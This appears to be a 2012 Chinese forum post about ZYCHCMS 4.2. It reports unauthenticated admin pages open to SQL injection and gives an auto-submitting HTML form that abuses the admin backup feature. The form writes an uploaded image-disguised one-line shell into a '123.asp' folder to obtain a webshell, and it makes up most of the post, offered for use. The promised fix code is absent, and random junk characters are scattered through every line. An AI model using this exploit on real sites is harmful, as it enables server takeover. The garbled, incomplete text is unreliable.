, y! }3 O" Y$ p ?5 R3 E$ E5 X7 h
, p, f1 `( \& m4 u3 }7 f
" z& P" a. d! o
; x( y1 E" j' Z5 c l7 P/ @: i影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)
: } A4 ^7 l, K$ ^ ①SQL注射漏洞9 ]$ ^4 h# c7 w0 m0 g- I6 t; C
漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp
1 _9 D( k4 H% r0 k 漏洞原因:未过滤
! a- G g& {' |; e7 ?5 D( m8 v 漏洞代码:# u& i( j2 G0 R2 v- A6 l6 g
都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。0 I4 ^; ]% ~ j' P" y
修复方法:在文件开头加入代码2 x3 W# a+ z! A* E m$ C
$ S: x2 V b) ]- S, [' ?; K4 ]& u* P6 U
②后台拿WBSHELL1 F3 M4 r+ ]8 a# I+ U& _7 q+ `
进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。
, a$ v' U# C" B8 @ 这里在网上找了一个,改了下,将就着用。
4 x; u7 s6 m* ?& J$ E. [! i/ |, i 以下是代码本地提交代码
4 t1 }- E# G6 g6 C2 G
: ?/ H9 e5 S1 y9 g* N. `8 j/ S. J
<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>. J [* a; f+ h9 R% t' B
<!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>
) i4 D* k9 X! h' O7 O# j9 ~ <tr>
. J7 s# J1 p6 B* t <td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>$ {# }, T0 Y1 v3 p4 G
</tr>
7 Z0 O" ~$ S+ A/ Z6 n <tr>2 l, G: W$ A9 S3 p
<td bgcolor=”#FFFFFF”><span class=”back_southidc”>& c! r0 ]. h7 @$ {& q
</span>
* b) n* L; Z+ ]" G q, ~5 r <table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >% I1 m/ D1 Z1 p# [) M
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >
; }: C/ v2 P7 W& _# L <td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>* A1 M% g" j7 d5 b3 Y
<td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d* ~' c' O( X* X, Q: P
<div align=”left”>: M! B: R% V) I& S
<input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />0 D% F$ i6 |6 t+ c
<!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>
9 s# H% z9 L3 |& d! V <input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />
* H: L$ ^% O- z" M- X6 B </div></td>' O" j* A: N2 f n+ w! V& {0 {2 W
</tr>
' X/ y! j0 m7 c T7 ?( c$ ? <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>4 u6 k& Q2 m, \1 ]. L! s
<td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>8 W" R: n0 G- b% Q F+ d9 |- N
<td class=”td”><div align=”left”>1 X6 u2 E( `' \3 v' c) R1 {( o# r
<input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />) C2 p/ `4 L/ x. G1 m' a# r- z# B$ |) w
[如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>
. N- q8 C R( r. G0 G$ Y </tr>
' m) K6 s$ V' X2 p- A <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>
, B( ]8 f9 \3 ^0 E6 q0 l0 ] <td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>
4 l2 T8 j. n$ ~+ F4 a# T" G# x4 X <td class=”td”><div align=”left”>1 j( l0 H5 |( j5 ~+ s M. P% b, L$ V
<input type=”submit” value=”确定备份” class=”btn”
3 M9 _0 A8 V. k3 B0 S" A </div></td>
9 L" n# ?" A4 G8 k+ i </tr> C* \2 n, J! X. T
</table></td></tr></form>
7 E/ X Y+ p7 _. k; F8 u7 } </table>$ ?- _( }8 D# A+ k {6 n
</td>
. X& y1 w; u( X. V4 h+ \5 H$ Y </tr>9 S! r4 p' W1 F+ I% t- ?5 a# e
</table>
9 L$ g- p* p; I <script>& m1 j) W8 r+ [) W! h& t
document.all.add.submit();
$ t1 R' p+ B4 `& E; n5 ?* V </script>
7 }7 u5 l% ^3 i v; x
: b/ x. {2 X7 F6 g3 p, n' [2 L# U9 N
; N1 ^# H8 B# Q' z
6 a1 m& @0 d% i, \8 L A
" d) M9 x; g I0 q L: S! N% m+ V2 H. X# a; b
7 M. G: n$ O, E$ c& D5 _9 A. h- F
! }, \, }0 ?4 G, h* p8 D
2 |7 ?3 v1 F$ r. q2 r
7 R: K' ]( [! c1 \ U |
发表于 2012-9-10 21:09:51
收藏
支持
反对